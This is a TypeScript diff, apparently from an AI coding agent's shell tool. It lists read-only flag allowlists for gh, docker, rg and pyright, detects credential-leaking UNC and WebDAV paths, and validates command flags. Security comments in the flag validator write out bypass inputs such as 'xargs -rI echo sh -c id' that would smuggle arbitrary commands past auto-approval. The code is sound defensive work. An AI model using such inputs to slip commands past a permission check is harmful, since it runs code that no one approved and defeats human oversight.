+ '--exclude-drafts': 'none', // Exclude draft releases
1155
+ '--exclude-pre-releases': 'none', // Exclude pre-releases
1156
+ '--json': 'string', // JSON field selection
1157
+ '--limit': 'number', // Max results
1158
+ '-L': 'number',
1159
+ '--order': 'string', // Order: asc|desc
1160
+ '-O': 'string',
1161
+ '--repo': 'string', // Target repository
1162
+ '-R': 'string',
1163
+ },
1164
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1165
+ },
1166
+ // gh release view is read-only — displays release details
1167
+ // NOTE: --web/-w intentionally excluded (opens browser)
1168
+ 'gh release view': {
1169
+ safeFlags: {
1170
+ '--json': 'string', // JSON field selection
1171
+ '--repo': 'string', // Target repository
1172
+ '-R': 'string',
1173
+ },
1174
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1175
+ },
1176
+ // gh workflow list is read-only — lists workflow files
1177
+ 'gh workflow list': {
1178
+ safeFlags: {
1179
+ '--all': 'none', // Include disabled workflows
1180
+ '-a': 'none',
1181
+ '--json': 'string', // JSON field selection
1182
+ '--limit': 'number', // Max results
1183
+ '-L': 'number',
1184
+ '--repo': 'string', // Target repository
1185
+ '-R': 'string',
1186
+ },
1187
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1188
+ },
1189
+ // gh workflow view is read-only — displays workflow summary
1190
+ // NOTE: --web/-w intentionally excluded (opens browser)
1191
+ 'gh workflow view': {
1192
+ safeFlags: {
1193
+ '--ref': 'string', // Branch/tag with workflow version
1194
+ '-r': 'string',
1195
+ '--yaml': 'none', // View workflow yaml
1196
+ '-y': 'none',
1197
+ '--repo': 'string', // Target repository
1198
+ '-R': 'string',
1199
+ },
1200
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1201
+ },
1202
+ // gh label list is read-only — lists labels
1203
+ // NOTE: --web/-w intentionally excluded (opens browser)
1204
+ 'gh label list': {
1205
+ safeFlags: {
1206
+ '--json': 'string', // JSON field selection
1207
+ '--limit': 'number', // Max results
1208
+ '-L': 'number',
1209
+ '--order': 'string', // Order: asc|desc
1210
+ '--search': 'string', // Search label names
1211
+ '-S': 'string',
1212
+ '--sort': 'string', // Sort: created|name
1213
+ '--repo': 'string', // Target repository
1214
+ '-R': 'string',
1215
+ },
1216
+ additionalCommandIsDangerousCallback: ghIsDangerousCallback,
1217
+ },
1218
+ // gh search repos is read-only — searches repositories
1219
+ // NOTE: --web/-w intentionally excluded (opens browser)
1220
+ 'gh search repos': {
1221
+ safeFlags: {
1222
+ '--archived': 'none', // Filter by archived state
1223
+ '--created': 'string', // Filter by creation date
1224
+ '--followers': 'string', // Filter by followers count
1225
+ '--forks': 'string', // Filter by forks count
1226
+ '--good-first-issues': 'string', // Filter by good first issues
1227
+ '--help-wanted-issues': 'string', // Filter by help wanted issues
1228
+ '--include-forks': 'string', // Include forks: false|true|only
1229
+ '--json': 'string', // JSON field selection
1230
+ '--language': 'string', // Filter by language
1231
+ '--license': 'string', // Filter by license
1232
+ '--limit': 'number', // Max results
1233
+ '-L': 'number',
1234
+ '--match': 'string', // Restrict to field: name|description|readme
1235
+ '--number-topics': 'string', // Filter by number of topics
1236
+ '--order': 'string', // Order: asc|desc
1237
+ '--owner': 'string', // Filter by owner
1238
+ '--size': 'string', // Filter by size range
1239
+ '--sort': 'string', // Sort: forks|help-wanted-issues|stars|updated
1240
+ '--stars': 'string', // Filter by stars
1241
+ '--topic': 'string', // Filter by topic
1242
+ '--updated': 'string', // Filter by update date
1243
+ '--visibility': 'string', // Filter: public|private|internal
1244
+ },
1245
+ },
1246
+ // gh search issues is read-only — searches issues
1247
+ // NOTE: --web/-w intentionally excluded (opens browser)
1248
+ 'gh search issues': {
1249
+ safeFlags: {
1250
+ '--app': 'string', // Filter by GitHub App author
1251
+ '--assignee': 'string', // Filter by assignee
1252
+ '--author': 'string', // Filter by author
1253
+ '--closed': 'string', // Filter by closed date
1254
+ '--commenter': 'string', // Filter by commenter
1255
+ '--comments': 'string', // Filter by comment count
1256
+ '--created': 'string', // Filter by creation date
1257
+ '--include-prs': 'none', // Include PRs in results
1258
+ '--interactions': 'string', // Filter by interactions count
1259
+ '--involves': 'string', // Filter by involvement
1260
+ '--json': 'string', // JSON field selection
1261
+ '--label': 'string', // Filter by label
1262
+ '--language': 'string', // Filter by language
1263
+ '--limit': 'number', // Max results
1264
+ '-L': 'number',
1265
+ '--locked': 'none', // Filter locked conversations
1266
+ '--match': 'string', // Restrict to field: title|body|comments
1267
+ '--mentions': 'string', // Filter by user mentions
1268
+ '--milestone': 'string', // Filter by milestone
1269
+ '--no-assignee': 'none', // Filter missing assignee
1270
+ '--no-label': 'none', // Filter missing label
1271
+ '--no-milestone': 'none', // Filter missing milestone
1272
+ '--no-project': 'none', // Filter missing project
1273
+ '--order': 'string', // Order: asc|desc
1274
+ '--owner': 'string', // Filter by owner
1275
+ '--project': 'string', // Filter by project
1276
+ '--reactions': 'string', // Filter by reaction count
1277
+ '--repo': 'string', // Filter by repository
1278
+ '-R': 'string',
1279
+ '--sort': 'string', // Sort field
1280
+ '--state': 'string', // Filter: open|closed
1281
+ '--team-mentions': 'string', // Filter by team mentions
1282
+ '--updated': 'string', // Filter by update date
1283
+ '--visibility': 'string', // Filter: public|private|internal
1284
+ },
1285
+ },
1286
+ // gh search prs is read-only — searches pull requests
1287
+ // NOTE: --web/-w intentionally excluded (opens browser)
1288
+ 'gh search prs': {
1289
+ safeFlags: {
1290
+ '--app': 'string', // Filter by GitHub App author
1291
+ '--assignee': 'string', // Filter by assignee
1292
+ '--author': 'string', // Filter by author
1293
+ '--base': 'string', // Filter by base branch
1294
+ '-B': 'string',
1295
+ '--checks': 'string', // Filter by check status
1296
+ '--closed': 'string', // Filter by closed date
1297
+ '--commenter': 'string', // Filter by commenter
1298
+ '--comments': 'string', // Filter by comment count
1299
+ '--created': 'string', // Filter by creation date
1300
+ '--draft': 'none', // Filter draft PRs
1301
+ '--head': 'string', // Filter by head branch
1302
+ '-H': 'string',
1303
+ '--interactions': 'string', // Filter by interactions count
1304
+ '--involves': 'string', // Filter by involvement
1305
+ '--json': 'string', // JSON field selection
1306
+ '--label': 'string', // Filter by label
1307
+ '--language': 'string', // Filter by language
1308
+ '--limit': 'number', // Max results
1309
+ '-L': 'number',
1310
+ '--locked': 'none', // Filter locked conversations
1311
+ '--match': 'string', // Restrict to field: title|body|comments
1312
+ '--mentions': 'string', // Filter by user mentions
1313
+ '--merged': 'none', // Filter merged PRs
1314
+ '--merged-at': 'string', // Filter by merge date
1315
+ '--milestone': 'string', // Filter by milestone
1316
+ '--no-assignee': 'none', // Filter missing assignee
1317
+ '--no-label': 'none', // Filter missing label
1318
+ '--no-milestone': 'none', // Filter missing milestone
1319
+ '--no-project': 'none', // Filter missing project
1320
+ '--order': 'string', // Order: asc|desc
1321
+ '--owner': 'string', // Filter by owner
1322
+ '--project': 'string', // Filter by project
1323
+ '--reactions': 'string', // Filter by reaction count
1324
+ '--repo': 'string', // Filter by repository
1325
+ '-R': 'string',
1326
+ '--review': 'string', // Filter by review status
1327
+ '--review-requested': 'string', // Filter by review requested
1328
+ '--reviewed-by': 'string', // Filter by reviewer
1329
+ '--sort': 'string', // Sort field
1330
+ '--state': 'string', // Filter: open|closed
1331
+ '--team-mentions': 'string', // Filter by team mentions
1332
+ '--updated': 'string', // Filter by update date
1333
+ '--visibility': 'string', // Filter: public|private|internal
1334
+ },
1335
+ },
1336
+ // gh search commits is read-only — searches commits
1337
+ // NOTE: --web/-w intentionally excluded (opens browser)
1338
+ 'gh search commits': {
1339
+ safeFlags: {
1340
+ '--author': 'string', // Filter by author
1341
+ '--author-date': 'string', // Filter by authored date
1342
+ '--author-email': 'string', // Filter by author email
1343
+ '--author-name': 'string', // Filter by author name
1344
+ '--committer': 'string', // Filter by committer
1345
+ '--committer-date': 'string', // Filter by committed date
1346
+ '--committer-email': 'string', // Filter by committer email
1347
+ '--committer-name': 'string', // Filter by committer name
1348
+ '--hash': 'string', // Filter by commit hash
1349
+ '--json': 'string', // JSON field selection
1350
+ '--limit': 'number', // Max results
1351
+ '-L': 'number',
1352
+ '--merge': 'none', // Filter merge commits
1353
+ '--order': 'string', // Order: asc|desc
1354
+ '--owner': 'string', // Filter by owner
1355
+ '--parent': 'string', // Filter by parent hash
1356
+ '--repo': 'string', // Filter by repository
1357
+ '-R': 'string',
1358
+ '--sort': 'string', // Sort: author-date|committer-date
1359
+ '--tree': 'string', // Filter by tree hash
1360
+ '--visibility': 'string', // Filter: public|private|internal
1361
+ },
1362
+ },
1363
+ // gh search code is read-only — searches code
1364
+ // NOTE: --web/-w intentionally excluded (opens browser)
1365
+ 'gh search code': {
1366
+ safeFlags: {
1367
+ '--extension': 'string', // Filter by file extension
1368
+ '--filename': 'string', // Filter by filename
1369
+ '--json': 'string', // JSON field selection
1370
+ '--language': 'string', // Filter by language
1371
+ '--limit': 'number', // Max results
1372
+ '-L': 'number',
1373
+ '--match': 'string', // Restrict to: file|path
1374
+ '--owner': 'string', // Filter by owner
1375
+ '--repo': 'string', // Filter by repository
1376
+ '-R': 'string',
1377
+ '--size': 'string', // Filter by size range
1378
+ },
1379
+ },
1380
+ }
1381
+
1382
+ // ---------------------------------------------------------------------------
1383
+ // DOCKER_READ_ONLY_COMMANDS — docker inspect/logs read-only commands
1384
+ // ---------------------------------------------------------------------------
1385
+
1386
+ export const DOCKER_READ_ONLY_COMMANDS: Record<string, ExternalCommandConfig> =
1387
+ {
1388
+ 'docker logs': {
1389
+ safeFlags: {
1390
+ '--follow': 'none',
1391
+ '-f': 'none',
1392
+ '--tail': 'string',
1393
+ '-n': 'string',
1394
+ '--timestamps': 'none',
1395
+ '-t': 'none',
1396
+ '--since': 'string',
1397
+ '--until': 'string',
1398
+ '--details': 'none',
1399
+ },
1400
+ },
1401
+ 'docker inspect': {
1402
+ safeFlags: {
1403
+ '--format': 'string',
1404
+ '-f': 'string',
1405
+ '--type': 'string',
1406
+ '--size': 'none',
1407
+ '-s': 'none',
1408
+ },
1409
+ },
1410
+ }
1411
+
1412
+ // ---------------------------------------------------------------------------
1413
+ // RIPGREP_READ_ONLY_COMMANDS — rg (ripgrep) read-only search
1414
+ // ---------------------------------------------------------------------------
1415
+
1416
+ export const RIPGREP_READ_ONLY_COMMANDS: Record<string, ExternalCommandConfig> =
1417
+ {
1418
+ rg: {
1419
+ safeFlags: {
1420
+ // Pattern flags
1421
+ '-e': 'string', // Pattern to search for
1422
+ '--regexp': 'string',
1423
+ '-f': 'string', // Read patterns from file
1424
+
1425
+ // Common search options
1426
+ '-i': 'none', // Case insensitive
1427
+ '--ignore-case': 'none',
1428
+ '-S': 'none', // Smart case
1429
+ '--smart-case': 'none',
1430
+ '-F': 'none', // Fixed strings
1431
+ '--fixed-strings': 'none',
1432
+ '-w': 'none', // Word regexp
1433
+ '--word-regexp': 'none',
1434
+ '-v': 'none', // Invert match
1435
+ '--invert-match': 'none',
1436
+
1437
+ // Output options
1438
+ '-c': 'none', // Count matches
1439
+ '--count': 'none',
1440
+ '-l': 'none', // Files with matches
1441
+ '--files-with-matches': 'none',
1442
+ '--files-without-match': 'none',
1443
+ '-n': 'none', // Line number
1444
+ '--line-number': 'none',
1445
+ '-o': 'none', // Only matching
1446
+ '--only-matching': 'none',
1447
+ '-A': 'number', // After context
1448
+ '--after-context': 'number',
1449
+ '-B': 'number', // Before context
1450
+ '--before-context': 'number',
1451
+ '-C': 'number', // Context
1452
+ '--context': 'number',
1453
+ '-H': 'none', // With filename
1454
+ '-h': 'none', // No filename
1455
+ '--heading': 'none',
1456
+ '--no-heading': 'none',
1457
+ '-q': 'none', // Quiet
1458
+ '--quiet': 'none',
1459
+ '--column': 'none',
1460
+
1461
+ // File filtering
1462
+ '-g': 'string', // Glob
1463
+ '--glob': 'string',
1464
+ '-t': 'string', // Type
1465
+ '--type': 'string',
1466
+ '-T': 'string', // Type not
1467
+ '--type-not': 'string',
1468
+ '--type-list': 'none',
1469
+ '--hidden': 'none',
1470
+ '--no-ignore': 'none',
1471
+ '-u': 'none', // Unrestricted
1472
+
1473
+ // Common options
1474
+ '-m': 'number', // Max count per file
1475
+ '--max-count': 'number',
1476
+ '-d': 'number', // Max depth
1477
+ '--max-depth': 'number',
1478
+ '-a': 'none', // Text (search binary files)
1479
+ '--text': 'none',
1480
+ '-z': 'none', // Search zip
1481
+ '-L': 'none', // Follow symlinks
1482
+ '--follow': 'none',
1483
+
1484
+ // Display options
1485
+ '--color': 'string',
1486
+ '--json': 'none',
1487
+ '--stats': 'none',
1488
+
1489
+ // Help and version
1490
+ '--help': 'none',
1491
+ '--version': 'none',
1492
+ '--debug': 'none',
1493
+
1494
+ // Special argument separator
1495
+ '--': 'none',
1496
+ },
1497
+ },
1498
+ }
1499
+
1500
+ // ---------------------------------------------------------------------------
1501
+ // PYRIGHT_READ_ONLY_COMMANDS — pyright static type checker
1502
+ // ---------------------------------------------------------------------------
1503
+
1504
+ export const PYRIGHT_READ_ONLY_COMMANDS: Record<string, ExternalCommandConfig> =
1505
+ {
1506
+ pyright: {
1507
+ respectsDoubleDash: false, // pyright treats -- as a file path, not end-of-options
1508
+ safeFlags: {
1509
+ '--outputjson': 'none',
1510
+ '--project': 'string',
1511
+ '-p': 'string',
1512
+ '--pythonversion': 'string',
1513
+ '--pythonplatform': 'string',
1514
+ '--typeshedpath': 'string',
1515
+ '--venvpath': 'string',
1516
+ '--level': 'string',
1517
+ '--stats': 'none',
1518
+ '--verbose': 'none',
1519
+ '--version': 'none',
1520
+ '--dependencies': 'none',
1521
+ '--warnings': 'none',
1522
+ },
1523
+ additionalCommandIsDangerousCallback: (
1524
+ _rawCommand: string,
1525
+ args: string[],
1526
+ ) => {
1527
+ // Check if --watch or -w appears as a standalone token (flag)
1528
+ return args.some(t => t === '--watch' || t === '-w')
1529
+ },
1530
+ },
1531
+ }
1532
+
1533
+ // ---------------------------------------------------------------------------
1534
+ // EXTERNAL_READONLY_COMMANDS — cross-shell read-only commands
1535
+ // Only commands that work identically in bash and PowerShell on Windows.
1536
+ // Unix-specific commands (cat, head, wc, etc.) belong in BashTool's READONLY_COMMANDS.
1537
+ // ---------------------------------------------------------------------------
1538
+
1539
+ export const EXTERNAL_READONLY_COMMANDS: readonly string[] = [
1540
+ // Cross-platform external tools that work the same in bash and PowerShell on Windows
1541
+ 'docker ps',
1542
+ 'docker images',
1543
+ ] as const
1544
+
1545
+ // ---------------------------------------------------------------------------
1546
+ // UNC path detection (shared across Bash and PowerShell)
1547
+ // ---------------------------------------------------------------------------
1548
+
1549
+ /**
1550
+ * Check if a path or command contains a UNC path that could trigger network
1551
+ * requests (NTLM/Kerberos credential leakage, WebDAV attacks).
1552
+ *
1553
+ * This function detects:
1554
+ * - Basic UNC paths: \\server\share, \\foo.com\file
1555
+ * - WebDAV patterns: \\server@SSL@8443\, \\server@8443@SSL\, \\server\DavWWWRoot\
1556
+ * - IP-based UNC: \\192.168.1.1\share, \\[2001:db8::1]\share
1557
+ * - Forward-slash variants: //server/share
1558
+ *
1559
+ * @param pathOrCommand The path or command string to check
1560
+ * @returns true if the path/command contains potentially vulnerable UNC paths
1561
+ */
1562
+ export function containsVulnerableUncPath(pathOrCommand: string): boolean {
1563
+ // Only check on Windows platform
1564
+ if (getPlatform() !== 'windows') {
1565
+ return false
1566
+ }
1567
+
1568
+ // 1. Check for general UNC paths with backslashes
1569
+ // Pattern matches: \\server, \\server\share, \\server/share, \\server@port\share
1570
+ // Uses [^\s\\/]+ for hostname to catch Unicode homoglyphs and other non-ASCII chars
1571
+ // Trailing accepts both \ and / since Windows treats both as path separators
1572
+ const backslashUncPattern = /\\\\[^\s\\/]+(?:@(?:\d+|ssl))?(?:[\\/]|$|\s)/i
1573
+ if (backslashUncPattern.test(pathOrCommand)) {
1574
+ return true
1575
+ }
1576
+
1577
+ // 2. Check for forward-slash UNC paths
1578
+ // Pattern matches: //server, //server/share, //server\share, //192.168.1.1/share
1579
+ // Uses negative lookbehind (?<!:) to exclude URLs (https://, http://, ftp://)
1580
+ // while catching // preceded by quotes, =, or any other non-colon character.
1581
+ // Trailing accepts both / and \ since Windows treats both as path separators
1582
+ const forwardSlashUncPattern =
1583
+ // eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() on short command strings
1584
+ /(?<!:)\/\/[^\s\\/]+(?:@(?:\d+|ssl))?(?:[\\/]|$|\s)/i
1585
+ if (forwardSlashUncPattern.test(pathOrCommand)) {
1586
+ return true
1587
+ }
1588
+
1589
+ // 3. Check for mixed-separator UNC paths (forward slash + backslashes)
1590
+ // On Windows/Cygwin, /\ is equivalent to // since both are path separators.
1591
+ // In bash, /\\server becomes /\server after escape processing, which is a UNC path.
1592
+ // Requires 2+ backslashes after / because a single backslash just escapes the next char
1593
+ // (e.g., /\a → /a after bash processing, which is NOT a UNC path).
1594
+ const mixedSlashUncPattern = /\/\\{2,}[^\s\\/]/
1595
+ if (mixedSlashUncPattern.test(pathOrCommand)) {
1596
+ return true
1597
+ }
1598
+
1599
+ // 4. Check for mixed-separator UNC paths (backslashes + forward slash)
1600
+ // \\/server in bash becomes \/server after escape processing, which is a UNC path
1601
+ // on Windows since both \ and / are path separators.
1602
+ const reverseMixedSlashUncPattern = /\\{2,}\/[^\s\\/]/
1603
+ if (reverseMixedSlashUncPattern.test(pathOrCommand)) {
1604
+ return true
1605
+ }
1606
+
1607
+ // 5. Check for WebDAV SSL/port patterns
1608
+ // Examples: \\server@SSL@8443\path, \\server@8443@SSL\path
1609
+ if (/@SSL@\d+/i.test(pathOrCommand) || /@\d+@SSL/i.test(pathOrCommand)) {
1610
+ return true
1611
+ }
1612
+
1613
+ // 6. Check for DavWWWRoot marker (Windows WebDAV redirector)
1614
+ // Example: \\server\DavWWWRoot\path
1615
+ if (/DavWWWRoot/i.test(pathOrCommand)) {
1616
+ return true
1617
+ }
1618
+
1619
+ // 7. Check for UNC paths with IPv4 addresses (explicit check for defense-in-depth)
1620
+ // Examples: \\192.168.1.1\share, \\10.0.0.1\path
1621
+ if (
1622
+ /^\\\\(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\\/]/.test(pathOrCommand) ||
1623
+ /^\/\/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\\/]/.test(pathOrCommand)
1624
+ ) {
1625
+ return true
1626
+ }
1627
+
1628
+ // 8. Check for UNC paths with bracketed IPv6 addresses (explicit check for defense-in-depth)
1629
+ // Examples: \\[2001:db8::1]\share, \\[::1]\path
1630
+ if (
1631
+ /^\\\\(\[[\da-fA-F:]+\])[\\/]/.test(pathOrCommand) ||
1632
+ /^\/\/(\[[\da-fA-F:]+\])[\\/]/.test(pathOrCommand)
1633
+ ) {
1634
+ return true
1635
+ }
1636
+
1637
+ return false
1638
+ }
1639
+
1640
+ // ---------------------------------------------------------------------------
1641
+ // Flag validation utilities
1642
+ // ---------------------------------------------------------------------------
1643
+
1644
+ // Regex pattern to match valid flag names (letters, digits, underscores, hyphens)
1645
+ export const FLAG_PATTERN = /^-[a-zA-Z0-9_-]/
1646
+
1647
+ /**
1648
+ * Validates flag arguments based on their expected type
1649
+ */
1650
+ export function validateFlagArgument(
1651
+ value: string,
1652
+ argType: FlagArgType,
1653
+ ): boolean {
1654
+ switch (argType) {
1655
+ case 'none':
1656
+ return false // Should not have been called for 'none' type
1657
+ case 'number':
1658
+ return /^\d+$/.test(value)
1659
+ case 'string':
1660
+ return true // Any string including empty is valid
1661
+ case 'char':
1662
+ return value.length === 1
1663
+ case '{}':
1664
+ return value === '{}'
1665
+ case 'EOF':
1666
+ return value === 'EOF'
1667
+ default:
1668
+ return false
1669
+ }
1670
+ }
1671
+
1672
+ /**
1673
+ * Validates the flags/arguments portion of a tokenized command against a config.
1674
+ * This is the flag-walking loop extracted from BashTool's isCommandSafeViaFlagParsing.
1675
+ *
1676
+ * @param tokens - Pre-tokenized args (from bash shell-quote or PowerShell AST)
1677
+ * @param startIndex - Where to start validating (after command tokens)
1678
+ * @param config - The safe flags config
1679
+ * @param options.commandName - For command-specific handling (git numeric shorthand, grep/rg attached numeric)
1680
+ * @param options.rawCommand - For additionalCommandIsDangerousCallback
1681
+ * @param options.xargsTargetCommands - If provided, enables xargs-style target command detection
1682
+ * @returns true if all flags are valid, false otherwise
1683
+ */
1684
+ export function validateFlags(
1685
+ tokens: string[],
1686
+ startIndex: number,
1687
+ config: ExternalCommandConfig,
1688
+ options?: {
1689
+ commandName?: string
1690
+ rawCommand?: string
1691
+ xargsTargetCommands?: string[]
1692
+ },
1693
+ ): boolean {
1694
+ let i = startIndex
1695
+
1696
+ while (i < tokens.length) {
1697
+ let token = tokens[i]
1698
+ if (!token) {
1699
+ i++
1700
+ continue
1701
+ }
1702
+
1703
+ // Special handling for xargs: once we find the target command, stop validating flags
1704
+ if (
1705
+ options?.xargsTargetCommands &&
1706
+ options.commandName === 'xargs' &&
1707
+ (!token.startsWith('-') || token === '--')
1708
+ ) {
1709
+ if (token === '--' && i + 1 < tokens.length) {
1710
+ i++
1711
+ token = tokens[i]
1712
+ }
1713
+ if (token && options.xargsTargetCommands.includes(token)) {
1714
+ break
1715
+ }
1716
+ return false
1717
+ }
1718
+
1719
+ if (token === '--') {
1720
+ // SECURITY: Only break if the tool respects POSIX `--` (default: true).
1721
+ // Tools like pyright don't respect `--` — they treat it as a file path
1722
+ // and continue processing subsequent tokens as flags. Breaking here
1723
+ // would let `pyright -- --createstub os` auto-approve a file-write flag.
1724
+ if (config.respectsDoubleDash !== false) {
1725
+ i++
1726
+ break // Everything after -- is arguments
1727
+ }
1728
+ // Tool doesn't respect --: treat as positional arg, keep validating
1729
+ i++
1730
+ continue
1731
+ }
1732
+
1733
+ if (token.startsWith('-') && token.length > 1 && FLAG_PATTERN.test(token)) {
1734
+ // Handle --flag=value format
1735
+ // SECURITY: Track whether the token CONTAINS `=` separately from
1736
+ // whether the value is non-empty. `-E=` has `hasEquals=true` but
1737
+ // `inlineValue=''` (falsy). Without `hasEquals`, the falsy check at
1738
+ // line ~1813 would fall through to "consume next token" — but GNU
1739
+ // getopt for short options with mandatory arg sees `-E=` as `-E` with
1740
+ // ATTACHED arg `=` (it doesn't strip `=` for short options). Parser
1741
+ // differential: validator advances 2 tokens, GNU advances 1.
1742
+ //
1743
+ // Attack: `xargs -E= EOF echo foo` (zero permissions)
1744
+ // Validator: inlineValue='' falsy → consumes EOF as -E arg → i+=2 →
1745
+ // echo ∈ SAFE_TARGET_COMMANDS_FOR_XARGS → break → AUTO-ALLOWED
1746
+ // GNU xargs: -E attached arg=`=` → EOF is TARGET COMMAND → CODE EXEC
1747
+ //
1748
+ // Fix: when hasEquals is true, use inlineValue (even if empty) as the
1749
+ // provided arg. validateFlagArgument('', 'EOF') → false → rejected.
1750
+ // This is correct for all arg types: the user explicitly typed `=`,
1751
+ // indicating they provided a value (empty). Don't consume next token.
1752
+ const hasEquals = token.includes('=')
1753
+ const [flag, ...valueParts] = token.split('=')
1754
+ const inlineValue = valueParts.join('=')
1755
+
1756
+ if (!flag) {
1757
+ return false
1758
+ }
1759
+
1760
+ const flagArgType = config.safeFlags[flag]
1761
+
1762
+ if (!flagArgType) {
1763
+ // Special case: git commands support -<number> as shorthand for -n <number>
1764
+ if (options?.commandName === 'git' && flag.match(/^-\d+$/)) {
1765
+ // This is equivalent to -n flag which is safe for git log/diff/show
1766
+ i++
1767
+ continue
1768
+ }
1769
+
1770
+ // Handle flags with directly attached numeric arguments (e.g., -A20, -B10)
1771
+ // Only apply this special handling to grep and rg commands
1772
+ if (
1773
+ (options?.commandName === 'grep' || options?.commandName === 'rg') &&
1774
+ flag.startsWith('-') &&
1775
+ !flag.startsWith('--') &&
1776
+ flag.length > 2
1777
+ ) {
1778
+ const potentialFlag = flag.substring(0, 2) // e.g., '-A' from '-A20'
1779
+ const potentialValue = flag.substring(2) // e.g., '20' from '-A20'
1780
+
1781
+ if (config.safeFlags[potentialFlag] && /^\d+$/.test(potentialValue)) {
1782
+ // This is a flag with attached numeric argument
1783
+ const flagArgType = config.safeFlags[potentialFlag]
1784
+ if (flagArgType === 'number' || flagArgType === 'string') {
1785
+ // Validate the numeric value
1786
+ if (validateFlagArgument(potentialValue, flagArgType)) {
1787
+ i++
1788
+ continue
1789
+ } else {
1790
+ return false // Invalid attached value
1791
+ }
1792
+ }
1793
+ }
1794
+ }
1795
+
1796
+ // Handle combined single-letter flags like -nr
1797
+ // SECURITY: We must NOT allow any bundled flag that takes an argument.
1798
+ // GNU getopt bundling semantics: when an arg-taking option appears LAST
1799
+ // in a bundle with no trailing chars, the NEXT argv element is consumed
1800
+ // as its argument. So `xargs -rI echo sh -c id` is parsed by xargs as:
1801
+ // -r (no-arg) + -I with replace-str=`echo`, target=`sh -c id`
1802
+ // Our naive handler previously only checked EXISTENCE in safeFlags (both
1803
+ // `-r: 'none'` and `-I: '{}'` are truthy), then `i++` consumed ONE token.
1804
+ // This created a parser differential: our validator thought `echo` was
1805
+ // the xargs target (in SAFE_TARGET_COMMANDS_FOR_XARGS → break), but
1806
+ // xargs ran `sh -c id`. ARBITRARY RCE with only Bash(echo:*) or less.
1807
+ //
1808
+ // Fix: require ALL bundled flags to have arg type 'none'. If any bundled
1809
+ // flag requires an argument (non-'none' type), reject the whole bundle.
1810
+ // This is conservative — it blocks `-rI` (xargs) entirely, but that's
1811
+ // the safe direction. Users who need `-I` can use it unbundled: `-r -I {}`.
1812
+ if (flag.startsWith('-') && !flag.startsWith('--') && flag.length > 2) {
1813
+ for (let j = 1; j < flag.length; j++) {
1814
+ const singleFlag = '-' + flag[j]
1815
+ const flagType = config.safeFlags[singleFlag]
1816
+ if (!flagType) {
1817
+ return false // One of the combined flags is not safe
1818
+ }
1819
+ // SECURITY: Bundled flags must be no-arg type. An arg-taking flag
1820
+ // in a bundle consumes the NEXT token in GNU getopt, which our
1821
+ // handler doesn't model. Reject to avoid parser differential.
1822
+ if (flagType !== 'none') {
1823
+ return false // Arg-taking flag in a bundle — cannot safely validate
1824
+ }
1825
+ }
1826
+ i++
1827
+ continue
1828
+ } else {
1829
+ return false // Unknown flag
1830
+ }
1831
+ }
1832
+
1833
+ // Validate flag arguments
1834
+ if (flagArgType === 'none') {
1835
+ // SECURITY: hasEquals covers `-FLAG=` (empty inline). Without it,
1836
+ // `-FLAG=` with 'none' type would pass (inlineValue='' is falsy).
1837
+ if (hasEquals) {
1838
+ return false // Flag should not have a value
1839
+ }
1840
+ i++
1841
+ } else {
1842
+ let argValue: string
1843
+ // SECURITY: Use hasEquals (not inlineValue truthiness). `-E=` must
1844
+ // NOT consume next token — the user explicitly provided empty value.
1845
+ if (hasEquals) {
1846
+ argValue = inlineValue
1847
+ i++
1848
+ } else {
1849
+ // Check if next token is the argument
1850
+ if (
1851
+ i + 1 >= tokens.length ||
1852
+ (tokens[i + 1] &&
1853
+ tokens[i + 1]!.startsWith('-') &&
1854
+ tokens[i + 1]!.length > 1 &&
1855
+ FLAG_PATTERN.test(tokens[i + 1]!))
1856
+ ) {
1857
+ return false // Missing required argument
1858
+ }
1859
+ argValue = tokens[i + 1] || ''
1860
+ i += 2
1861
+ }
1862
+
1863
+ // Defense-in-depth: For string arguments, reject values that start with '-'
1864
+ // This prevents type confusion attacks where a flag marked as 'string'
1865
+ // but actually takes no arguments could be used to inject dangerous flags
1866
+ // Exception: git's --sort flag can have values starting with '-' for reverse sorting
1867
+ if (flagArgType === 'string' && argValue.startsWith('-')) {
1868
+ // Special case: git's --sort flag allows - prefix for reverse sorting
1869
+ if (
1870
+ flag === '--sort' &&
1871
+ options?.commandName === 'git' &&
1872
+ argValue.match(/^-[a-zA-Z]/)
1873
+ ) {
1874
+ // This looks like a reverse sort (e.g., -refname, -version:refname)
1875
+ // Allow it if the rest looks like a valid sort key
1876
+ } else {
1877
+ return false
1878
+ }
1879
+ }
1880
+
1881
+ // Validate argument based on type
1882
+ if (!validateFlagArgument(argValue, flagArgType)) {
1883
+ return false
1884
+ }
1885
+ }
1886
+ } else {
1887
+ // Non-flag argument (like revision specs, file paths, etc.) - this is allowed
1888
+ i++
1889
+ }
1890
+ }
1891
+
1892
+ return true
1893
+ }